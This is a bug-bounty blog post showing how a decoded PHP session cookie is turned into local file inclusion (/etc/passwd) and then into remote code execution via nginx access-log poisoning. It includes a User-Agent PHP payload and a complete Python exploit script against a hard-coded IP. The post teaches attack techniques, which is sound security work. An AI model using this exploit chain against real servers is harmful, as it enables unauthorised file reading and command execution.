Open in app

Sign in

Write

Sign in

LFI to RCE — Bug bounty

Facundo Fernandez
5 min readNov 7, 2023

--

Alright guys, in my latest post, I shared how a simple SQL query enabled me to take over an account. If you haven’t read it yet, go ahead and take a look, like it, comment, and share!

I would love to connect on LinkedIn with you, if you haven’t, send me a request, would love to be friends.

HAPPYHACKING

After a few hours of gathering info on this web app and doing recon. I saw a Cookie: PHPSESSID=

PHPSESSID — The PHPSESSID cookie is native to PHP and enables websites to store serialised state data. It is used to establish a user session and to pass state data via a temporary cookie, which is commonly referred to as a session cookie. (expires when you close your browser). It is usually encoded in Base64.

⚠️PRO TIP: Always try to decode these!⚠️

Main 2 ways to decode this:

  1. Using base64decode.org:

2. By using Python:

/www/index.html = 15 characters — that is why s:15

With that information in mind let’s play a little bit and see if we can exploit this!

LFI vulnerability

What is LFI?

Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server. LFI attacks can expose sensitive information, and in severe cases, they can lead to cross-site scripting (XSS) and remote code execution.

What if I replace /www/index.html with /etc/passwd

You guys can use an online decoder or follow my steps using Python!

Now that I have my new malicious cookie encoded

I am going to do this in three different ways to demonstrate different exploitation paths.

Change the cookies on the site and retrieve the info

Send a request using Python and print the results

Change the cookie using Burp Suite

LFI to RCE

What is RCE?

Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

To do this I am going to use Python, why? Because Python is fun. I will give a thorough explanation of my script here in a minute, so seat tight.

The easiest way to get RCE from an LFI vulnerability is through log poisoning.

What is log poisoning?

Log poisoning or Log injection is a technique that allows the attacker to tamper with the log file contents like inserting the malicious code to the server logs to execute commands remotely or to get a reverse shell. It will work only when the application is already vulnerable to LFI.

In this case I am not allowed to try to get a reverse shell, so I will simply try to list a directory using, “ls -lsa” — “ls -l”

Remember the LFI vuln. only allows us to read/execute files, not write or create new ones. So how are we going to inject code? Well, we can add logs to a server file, can’t we?

First, we need to know what server is running:

NGINX!! Those files are stored in: /var/log/nginx/access.log

First let’s see if we have access to the log file with our Python script:

Nice, we do have it!! Now, let’s see if we can add logs by using the header “User-Agent”

In my Python Script, I will add the following:

headers = {'User-Agent': 'Facundo Fernandez'}

And we get:

Instead of typing my name let's use:

headers = {'User-Agent': "<?php system('ls -lsa');?>"

Successful Remote Code Execution!

Code explanation:

import base64
# Importing the base64 module, which is used for encoding and decoding base64 data.

# Creating a byte string that mimics a serialized PHP object.
# This could be used to exploit object injection vulnerabilities in PHP applications.
malicious_cookie = b'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}'
print('Malicious Cookie:', malicious_cookie)
# Printing the created malicious byte string (cookie) for demonstration.

# Encoding the malicious cookie using base64.
# This is necessary because cookies are usually base64-encoded during HTTP communication.
malicious_cookie_encoded = base64.b64encode(malicious_cookie)
print('Malicious cookie encoded:', malicious_cookie_encoded)
# Printing the base64-encoded version of the malicious cookie.

# Our Target
# This should be a URL under your control or where you have permission to test.
url = 'http://142.93.32.153:31043'

# Creating a cookies dictionary with the 'PHPSESSID' as the key and the encoded malicious cookie as the value.
cookies = {'PHPSESSID': malicious_cookie_encoded.decode()}

# Creating a headers dictionary, attempting to pass PHP code in the User-Agent header.
# The intention here is to test for Remote Code Execution (RCE) by trying to get the server to execute the 'ls' command.
headers = {'User-Agent': "<?php system('ls -lsa');?>"} 

# Sending a GET request to the specified URL with the malicious cookies and headers.
r = requests.get(url, cookies=cookies, headers=headers)
print(r.text)
# Printing the response text from the server.
# If the server is vulnerable and executes the code, you might see the result of the 'ls -lsa' command in the response.

Thanks for reading, if you have any questions, comment and I will get back to you!

Let’s connect on LinkedIn

Bug Bounty
Penetration Testing
Hacking
Bug Bounty Tips
Cybersecurity

--

--

Facundo Fernandez
Facundo Fernandez

Written by Facundo Fernandez

1.1K Followers
74 Following

Www.linkedin.com/in/facufernandez

Responses (11)

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams